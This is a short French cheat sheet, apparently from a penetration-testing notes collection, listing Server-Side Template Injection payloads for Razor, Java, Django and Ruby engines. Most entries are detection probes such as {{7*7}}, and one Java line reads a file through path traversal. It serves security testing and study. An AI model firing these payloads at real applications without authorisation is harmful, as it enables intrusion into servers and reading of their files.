Payloads de Server-Side Template Injection ([[SSTI - Server-Side Template Injection|SSTI]]) couvrant les principaux moteurs de templates : Jinja2 (Python/Flask), Twig (PHP/Symfony), Smarty, Freemarker, Velocity, Mako, ASP.NET Razor, ERB (Ruby), Handlebars. De la détection (`{{7*7}}`) jusqu'à la RCE complète. ### ASP.NET Razor ```asp @(1+2) ``` Execution de commande : ```asp @{ Code en C } ``` ### Java ```Java ${7*7} ${{7*7}} ${class.getClassLoader()} ${class.getResource("").getPath()} ${class.getResource("../../../../../index.htm").getContent()} ``` ```Django {% csrf_token %} # doit causer une erreur {{ 7*7 }} # doit causer une erreur ih0vr{{364|add:733}}d121r ``` ### Ruby ```Ruby <%= 7 * 7 %> ```